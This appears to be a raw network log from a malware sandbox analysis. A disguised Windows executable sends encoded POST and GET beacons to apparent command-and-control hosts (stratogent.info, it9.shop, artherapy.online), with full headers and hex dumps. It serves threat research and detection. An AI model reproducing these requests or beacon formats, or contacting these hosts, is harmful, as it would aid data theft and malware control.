VzK4o8Jx=QjLVpD5ZfO6iMlss73Z3Snfy3OvuQBGAqkR0qMh5U6c4wyh2OyucWvxyJ0qxQqHE1k5KX/a+zMZ/psJb5vD4wr5h6bItnv3rpBd7qp62crKT6LSAPsmMM+bRm6LU7ujJTsCISixgMAko0Uaihbw0zEkmkDgWtn5wmQOsOsOdfEiZtrdnyXc0cskh1JZvIwf87wZHlUFJTWQPD9p+zZAwBhY=
Oct 7, 2024 11:53:17.442954063 CEST	325	IN	HTTP/1.1 301 Moved Permanently location: https://stratogent.info/f3n5/ vary: Accept-Encoding server: DPS/2.0.0+sha-227ca78 x-version: 227ca78 x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Mon, 07 Oct 2024 09:53:17 GMT keep-alive: timeout=5 transfer-encoding: chunked connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.11.30	49796	76.223.105.230	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:53:19.979509115 CEST	3802	OUT	POST /f3n5/ HTTP/1.1 Host: www.stratogent.info Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.stratogent.info Referer: http://www.stratogent.info/f3n5/ Connection: close Content-Length: 3341 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 51 6a 4c 56 70 44 35 5a 66 4f 36 69 4d 6c 73 73 37 33 5a 33 53 6e 66 79 33 4f 76 75 51 42 47 41 71 6b 52 30 71 4d 68 35 55 35 38 34 7a 44 42 32 50 52 32 63 45 66 78 79 46 55 71 77 51 71 48 6a 31 67 56 47 58 2f 6d 45 7a 4b 64 2f 7a 4b 39 62 78 2b 44 34 2b 72 35 68 6c 4c 49 73 6f 50 33 45 70 42 74 6b 71 74 65 32 63 72 4b 54 36 4b 43 41 62 6f 79 4d 4b 2b 62 51 79 71 4c 49 6f 2b 6a 68 54 73 4b 79 53 69 46 61 4d 44 45 6f 7a 6e 53 69 68 6f 59 30 7a 45 6b 6d 2f 7a 67 74 74 6e 31 31 6d 54 2f 74 4f 6f 53 53 66 30 32 5a 39 4f 63 2b 6f 7a 55 56 4b 4e 56 71 32 4b 74 75 48 44 62 67 7a 52 59 68 73 79 55 35 54 57 55 36 48 64 70 61 30 36 51 49 64 56 66 79 44 62 68 6d 74 34 34 65 79 4c 34 4f 73 76 41 61 53 38 4d 74 46 77 43 54 6a 54 4b 6f 2f 6d 57 7a 33 68 31 62 6a 52 33 30 4c 6d 73 75 36 50 34 66 54 4f 4d 59 7a 41 55 78 5a 4c 46 68 69 39 48 77 78 4b 43 30 77 5a 6c 55 39 79 79 4c 48 36 34 35 56 71 2f 33 39 68 37 70 43 78 68 5a 77 70 69 5a 30 65 35 4e 4f 66 78 30 6f 6b 4e 50 68 49 2b 46 64 [TRUNCATED] Data Ascii: VzK4o8Jx=QjLVpD5ZfO6iMlss73Z3Snfy3OvuQBGAqkR0qMh5U584zDB2PR2cEfxyFUqwQqHj1gVGX/mEzKd/zK9bx+D4+r5hlLIsoP3EpBtkqte2crKT6KCAboyMK+bQyqLIo+jhTsKySiFaMDEoznSihoY0zEkm/zgttn11mT/tOoSSf02Z9Oc+ozUVKNVq2KtuHDbgzRYhsyU5TWU6Hdpa06QIdVfyDbhmt44eyL4OsvAaS8MtFwCTjTKo/mWz3h1bjR30Lmsu6P4fTOMYzAUxZLFhi9HwxKC0wZlU9yyLH645Vq/39h7pCxhZwpiZ0e5NOfx0okNPhI+FdFFjJoFYUir8j8gKEJ4u83yNSKr3vRmu0WqL/NFsh7kY7v8244spUg/DnP0q5bBkwLlminEalQjL1P1PBYWNysdD/rbHdfNMIxytqFOGWWVzD6z8YfgjcZidUWvbDugIfkKFy0x1w9e+BsFRZFCbOhhFuovIX6aV5Dt5jrWb7Wt+QoUnvhjboBRt3tbmIvFojVmFKPsKcQ19r/tKRSEz/9jLuL/zYfdNne7+i/bYnmwNUNG8oNCKddZUNSA6R/RHBc5G9hiiwkluM8JyTP0jw5wsnNslJwV5umaWTeaRcu9C8JFkAPVK08TzFnRLRj7AHJwO5YNQJUXM4z2W8o3pmMNe3kWtCBXJc00/tYZHAR0wC1jsDuHj102fnDpbSlkTnXblS5PMyb8W6sZaLFr8StsZjtucOFb8abya0kyxyAwqthebe4b8qAO8cAWuEoHE9wPTePIufjpKAWAqbMyG9ClFAJHYusceAt9P18UkYkdnz0BugVP1XA8Hvim6YEoRt2mAd44sEOQ/yU4WJrDO2g3RfVkkEiMFmevXItzqlJvhxREvls2qLamGuNOV60SXtD6HuBnqoPhG3Fzlw/CWd7NPC76og2vFyBLADebJucv0t5rjwl2miu74gd79gK2JXaYxDZhAOoSQpFQ6fGLGnWPydQgD5b9ZRzl [TRUNCATED]
Oct 7, 2024 11:53:20.082837105 CEST	325	IN	HTTP/1.1 301 Moved Permanently location: https://stratogent.info/f3n5/ vary: Accept-Encoding server: DPS/2.0.0+sha-227ca78 x-version: 227ca78 x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Mon, 07 Oct 2024 09:53:20 GMT keep-alive: timeout=5 transfer-encoding: chunked connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.11.30	49797	76.223.105.230	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:53:22.611362934 CEST	392	OUT	GET /f3n5/?VzK4o8Jx=dhj1q08La8WFEWo3xk5bQlyPjuL1dgahmkpS3NRsd6Y/mAIsEkGjeuU1SXWIZ8LAwVs2eJKJ0+NM44t35YuY5s8XjK0+kf3wgV05m6WJetyMkfq7N/qTBt8=&0zu8A=o2yln6 HTTP/1.1 Host: www.stratogent.info Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Oct 7, 2024 11:53:22.718056917 CEST	468	IN	HTTP/1.1 301 Moved Permanently location: https://stratogent.info/f3n5/?VzK4o8Jx=dhj1q08La8WFEWo3xk5bQlyPjuL1dgahmkpS3NRsd6Y/mAIsEkGjeuU1SXWIZ8LAwVs2eJKJ0+NM44t35YuY5s8XjK0+kf3wgV05m6WJetyMkfq7N/qTBt8=&0zu8A=o2yln6 vary: Accept-Encoding server: DPS/2.0.0+sha-227ca78 x-version: 227ca78 x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Mon, 07 Oct 2024 09:53:22 GMT keep-alive: timeout=5 transfer-encoding: chunked connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.11.30	49798	121.254.178.239	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:53:28.566169024 CEST	644	OUT	POST /acqm/ HTTP/1.1 Host: www.it9.shop Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.it9.shop Referer: http://www.it9.shop/acqm/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 73 4d 4d 56 6e 48 30 50 59 33 63 4d 50 2f 34 49 43 78 75 63 6e 52 6b 49 50 35 4b 71 4e 2b 72 4d 79 62 47 4d 59 57 52 4c 6a 41 77 6f 56 77 69 5a 45 2f 4d 4e 4e 4e 39 49 6a 38 43 78 46 4c 76 35 58 70 39 37 69 35 59 70 54 51 33 41 6e 4e 4a 4a 4b 4b 32 32 59 45 64 47 32 70 64 79 6f 75 69 49 50 64 63 34 4b 4f 54 31 6e 6a 37 43 31 52 6b 44 4b 68 43 67 77 65 77 4c 6e 35 44 71 4c 51 46 7a 77 31 4d 41 73 41 65 5a 64 33 54 32 4f 34 4b 73 55 63 54 62 6d 6b 51 4a 4d 6f 43 6b 65 55 73 64 43 6f 34 68 46 34 45 47 58 69 64 6b 2b 4a 53 74 63 4e 79 47 30 32 54 5a 57 31 7a 50 70 42 6b 74 79 51 3d 3d Data Ascii: VzK4o8Jx=sMMVnH0PY3cMP/4ICxucnRkIP5KqN+rMybGMYWRLjAwoVwiZE/MNNN9Ij8CxFLv5Xp97i5YpTQ3AnNJJKK22YEdG2pdyouiIPdc4KOT1nj7C1RkDKhCgwewLn5DqLQFzw1MAsAeZd3T2O4KsUcTbmkQJMoCkeUsdCo4hF4EGXidk+JStcNyG02TZW1zPpBktyQ==
Oct 7, 2024 11:53:28.862284899 CEST	367	IN	HTTP/1.1 404 Not Found Date: Mon, 07 Oct 2024 09:53:28 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 63 71 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /acqm/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.11.30	49799	121.254.178.239	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:53:31.408710957 CEST	664	OUT	POST /acqm/ HTTP/1.1 Host: www.it9.shop Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.it9.shop Referer: http://www.it9.shop/acqm/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 73 4d 4d 56 6e 48 30 50 59 33 63 4d 4f 62 38 49 4f 79 32 63 67 78 6b 4c 41 5a 4b 71 55 75 72 41 79 62 36 4d 59 56 63 4d 6a 79 55 6f 51 6c 4f 5a 57 72 67 4e 41 74 39 49 74 63 43 77 59 62 76 75 58 70 42 7a 69 34 30 70 54 51 6a 41 6e 4d 35 4a 4b 62 32 31 5a 55 64 2b 2b 4a 64 38 77 4f 69 49 50 64 63 34 4b 4e 76 66 6e 6c 54 43 31 68 30 44 46 6a 36 6a 75 4f 77 4d 76 5a 44 71 42 77 46 2f 77 31 4d 2b 73 42 44 4d 64 30 72 32 4f 35 57 73 56 4a 76 55 2f 30 51 50 49 6f 44 49 56 47 6f 57 5a 4a 64 56 42 2f 38 7a 58 42 68 77 32 2b 6a 33 42 4f 47 45 6e 57 76 30 4b 30 65 6e 72 44 6c 32 76 55 4b 42 69 63 75 76 33 71 34 35 79 36 5a 7a 64 49 62 77 56 75 77 3d Data Ascii: VzK4o8Jx=sMMVnH0PY3cMOb8IOy2cgxkLAZKqUurAyb6MYVcMjyUoQlOZWrgNAt9ItcCwYbvuXpBzi40pTQjAnM5JKb21ZUd++Jd8wOiIPdc4KNvfnlTC1h0DFj6juOwMvZDqBwF/w1M+sBDMd0r2O5WsVJvU/0QPIoDIVGoWZJdVB/8zXBhw2+j3BOGEnWv0K0enrDl2vUKBicuv3q45y6ZzdIbwVuw=
Oct 7, 2024 11:53:31.711213112 CEST	367	IN	HTTP/1.1 404 Not Found Date: Mon, 07 Oct 2024 09:53:31 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 63 71 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /acqm/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.11.30	49800	121.254.178.239	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:53:34.244731903 CEST	1289	OUT	POST /acqm/ HTTP/1.1 Host: www.it9.shop Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.it9.shop Referer: http://www.it9.shop/acqm/ Connection: close Content-Length: 3341 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 73 4d 4d 56 6e 48 30 50 59 33 63 4d 4f 62 38 49 4f 79 32 63 67 78 6b 4c 41 5a 4b 71 55 75 72 41 79 62 36 4d 59 56 63 4d 6a 79 63 6f 4d 44 61 5a 45 63 30 4e 42 74 39 49 7a 4d 43 31 59 62 76 7a 58 74 56 33 69 34 70 55 54 53 62 41 6f 4b 4e 4a 65 35 53 31 41 6b 64 2b 38 4a 64 78 6f 75 6a 4b 50 64 4d 30 4b 4e 2f 66 6e 6c 54 43 31 6e 51 44 43 78 43 6a 73 4f 77 4c 6e 35 43 6c 4c 51 46 54 77 32 38 49 73 43 75 33 64 33 4c 32 4f 4b 75 73 56 37 48 55 2f 30 51 50 46 49 44 4a 56 48 55 56 5a 4a 55 4d 42 36 49 38 51 78 56 77 31 61 72 75 55 75 36 7a 39 6c 50 62 4b 67 65 68 68 7a 68 43 6c 48 58 38 7a 4e 2b 42 30 36 77 52 7a 64 31 55 4d 4e 7a 56 58 4a 46 38 36 58 4c 6a 46 34 68 47 43 6e 6a 65 4c 6e 36 68 44 66 36 6c 53 35 35 79 70 68 55 4a 4c 68 6f 61 64 4d 55 4b 35 46 78 54 2b 44 58 36 53 77 4a 6d 6d 75 62 76 4b 45 73 62 65 42 52 55 5a 65 59 68 31 38 53 61 42 4b 53 37 31 47 53 6e 45 75 6e 6c 52 64 68 58 69 4f 36 58 49 76 4e 31 4a 6b 66 62 6d 32 74 6c 44 71 65 4d 55 33 51 47 46 46 54 6b 30 [TRUNCATED] Data Ascii: VzK4o8Jx=sMMVnH0PY3cMOb8IOy2cgxkLAZKqUurAyb6MYVcMjycoMDaZEc0NBt9IzMC1YbvzXtV3i4pUTSbAoKNJe5S1Akd+8JdxoujKPdM0KN/fnlTC1nQDCxCjsOwLn5ClLQFTw28IsCu3d3L2OKusV7HU/0QPFIDJVHUVZJUMB6I8QxVw1aruUu6z9lPbKgehhzhClHX8zN+B06wRzd1UMNzVXJF86XLjF4hGCnjeLn6hDf6lS55yphUJLhoadMUK5FxT+DX6SwJmmubvKEsbeBRUZeYh18SaBKS71GSnEunlRdhXiO6XIvN1Jkfbm2tlDqeMU3QGFFTk06BxUegQi489vnSikh27InmJqM2eGEFdMEjBWdHsUMRFRKWaRBo25NIUn3LH+nGJAhFYs9sVbQs742P6ZB64N36cuyqJqJAktUbVg/0nSJplAVEeVkK7GZHRJHLbnlaY0gmc67ePUKthqvSLBtdHPtj6Oi+u0ClUEZZG6tLwJaHwPudQxKTCpw9tgEjHx0A/1VErOJpsJtkXvU+nmRj/NMnosQH7yLlFxbSR7ByO7A+Jrm2OU9J5JxxPiAiPkbPPxJryJa6sRyOkCKjhPaOItSIDd9ar+C3o/1Q4uY4kJx18jv7n/UWfP0Ee5pcRu51ExzySahvxKiUHYBvw6kHbsjC0CzIK8qplSTF9IoOJcbwkTUsXoIZblqqufLp0cYlaZfFYJCOqG3TzIFMOzyCQOp2sgMoUN04BELyVjKGnww1gwYjP+4xtONaS6EcX3c2sY+XkbA8aPFMQQ/eMlwBadjX4hn7wIJ225ZzkpkI4tEwgwy5PjVSZumpvKvFBgaJz
Oct 7, 2024 11:53:34.244790077 CEST	2492	OUT	Data Raw: 48 71 55 7a 59 72 46 4b 6f 72 76 63 2b 59 4b 67 66 75 63 4e 4c 32 56 41 79 4d 6e 56 6c 4c 6c 68 77 33 55 4f 66 2b 42 30 39 61 36 75 30 2f 34 6a 4d 79 6d 5a 36 6c 38 4c 5a 38 43 64 67 47 39 50 6c 6c 71 64 70 73 6e 64 73 2b 5a 68 39 74 61 6d 79 67 Data Ascii: HqUzYrFKorvc+YKgfucNL2VAyMnVlLlhw3UOf+B09a6u0/4jMymZ6l8LZ8CdgG9Pllqdpsnds+Zh9tamygnWC5p6ko1cR+lde414Yph1iTXN+pfVIdG0SAFWrGoIPKxrsnzL+iHQVNtDsZR4fqEPEyvzaZrYt5iP5oh4z2W3cKfmTfMMa1sSg7PWnzRUU9KE9DMBHj4aj5/NDJpq8/3MyubOIGhrBEtlrpGrk6zXxkSkPLmVgDJ
Oct 7, 2024 11:53:34.539506912 CEST	367	IN	HTTP/1.1 404 Not Found Date: Mon, 07 Oct 2024 09:53:34 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 63 71 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /acqm/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.11.30	49801	121.254.178.239	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:53:37.062755108 CEST	385	OUT	GET /acqm/?0zu8A=o2yln6&VzK4o8Jx=hOk1k3UNcVwpG+EJEDicqQpIOObLS/TgyY32GlBOoCoiXDXAZ6sWDP89y5CwOebPWohVlvJHYhDsteptd/L7YydfwpVPpt2oIMR5Kfz9plXO/BQcfDKFtuw= HTTP/1.1 Host: www.it9.shop Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Oct 7, 2024 11:53:37.347417116 CEST	367	IN	HTTP/1.1 404 Not Found Date: Mon, 07 Oct 2024 09:53:37 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 63 71 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /acqm/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.11.30	49802	3.33.130.190	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:53:42.601903915 CEST	668	OUT	POST /xha2/ HTTP/1.1 Host: www.artherapy.online Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.artherapy.online Referer: http://www.artherapy.online/xha2/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 63 68 66 30 39 4e 32 61 75 43 78 42 7a 4f 73 79 50 65 32 49 79 76 6e 49 58 6d 56 57 4a 62 62 76 66 30 50 67 47 39 37 66 46 68 6d 78 59 57 64 4a 71 34 43 6b 33 4c 31 6c 48 63 66 32 54 71 69 44 75 52 63 65 57 45 2b 33 48 33 31 41 4e 79 56 6e 43 45 64 31 59 67 74 75 79 50 64 79 39 64 30 53 66 6f 78 74 51 6e 67 41 52 50 7a 47 51 52 67 48 36 55 39 36 49 48 64 66 4b 4b 55 4d 37 51 32 6c 6e 4a 53 6b 6b 61 36 2f 59 6c 46 38 43 4a 75 56 30 67 70 7a 79 76 50 68 2f 79 57 6d 64 71 52 43 58 78 47 79 52 41 73 42 2f 66 4f 64 58 2f 61 72 5a 76 6c 34 42 57 42 32 52 6e 7a 46 44 55 37 45 62 67 3d 3d Data Ascii: VzK4o8Jx=chf09N2auCxBzOsyPe2IyvnIXmVWJbbvf0PgG97fFhmxYWdJq4Ck3L1lHcf2TqiDuRceWE+3H31ANyVnCEd1YgtuyPdy9d0SfoxtQngARPzGQRgH6U96IHdfKKUM7Q2lnJSkka6/YlF8CJuV0gpzyvPh/yWmdqRCXxGyRAsB/fOdX/arZvl4BWB2RnzFDU7Ebg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.11.30	49803	3.33.130.190	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:53:45.242136002 CEST	688	OUT	POST /xha2/ HTTP/1.1 Host: www.artherapy.online Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.artherapy.online Referer: http://www.artherapy.online/xha2/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 63 68 66 30 39 4e 32 61 75 43 78 42 79 76 63 79 49 39 65 49 30 50 6e 58 59 47 56 57 63 4c 62 72 66 30 44 67 47 38 50 50 46 53 4f 78 59 33 74 4a 72 35 43 6b 6e 62 31 6c 4d 38 66 7a 63 4b 69 49 75 52 51 67 57 45 79 33 48 32 56 41 4e 7a 6c 6e 43 31 64 32 4b 41 74 73 2f 76 64 77 67 4e 30 53 66 6f 78 74 51 6d 45 71 52 4d 44 47 51 68 77 48 37 31 39 35 45 6e 64 63 63 61 55 4d 71 67 32 70 6e 4a 53 57 6b 5a 2b 46 59 67 5a 38 43 49 65 56 31 30 31 77 38 76 4f 71 69 43 58 33 56 35 41 76 57 6c 71 41 56 77 41 6d 2f 71 54 69 62 49 72 78 45 73 52 36 53 32 39 62 4e 6d 65 74 42 57 36 66 47 70 49 44 79 57 58 46 6d 42 78 33 6e 74 4b 66 55 43 6c 32 69 6a 59 3d Data Ascii: VzK4o8Jx=chf09N2auCxByvcyI9eI0PnXYGVWcLbrf0DgG8PPFSOxY3tJr5Cknb1lM8fzcKiIuRQgWEy3H2VANzlnC1d2KAts/vdwgN0SfoxtQmEqRMDGQhwH7195EndccaUMqg2pnJSWkZ+FYgZ8CIeV101w8vOqiCX3V5AvWlqAVwAm/qTibIrxEsR6S29bNmetBW6fGpIDyWXFmBx3ntKfUCl2ijY=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.11.30	49804	3.33.130.190	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:53:47.882894039 CEST	2578	OUT	POST /xha2/ HTTP/1.1 Host: www.artherapy.online Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.artherapy.online Referer: http://www.artherapy.online/xha2/ Connection: close Content-Length: 3341 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 63 68 66 30 39 4e 32 61 75 43 78 42 79 76 63 79 49 39 65 49 30 50 6e 58 59 47 56 57 63 4c 62 72 66 30 44 67 47 38 50 50 46 53 57 78 59 46 6c 4a 71 61 71 6b 6b 62 31 6c 44 73 66 79 63 4b 69 5a 75 52 5a 6e 57 45 50 41 48 7a 52 41 4d 56 5a 6e 4a 68 42 32 54 77 74 73 6a 66 64 31 39 64 30 48 66 6f 68 68 51 6e 30 71 52 4d 44 47 51 6a 34 48 38 6b 39 35 47 6e 64 66 4b 4b 55 49 37 51 33 2b 6e 49 37 68 6b 59 4c 79 59 6c 4e 38 43 62 6d 56 30 48 64 77 38 76 4f 71 76 69 58 36 56 35 4d 79 57 68 47 63 56 78 4a 54 2f 62 6a 69 59 38 61 38 51 76 78 48 49 45 39 73 45 56 79 71 46 58 57 4c 47 4a 6b 30 30 46 44 33 67 77 52 59 2f 59 57 67 54 33 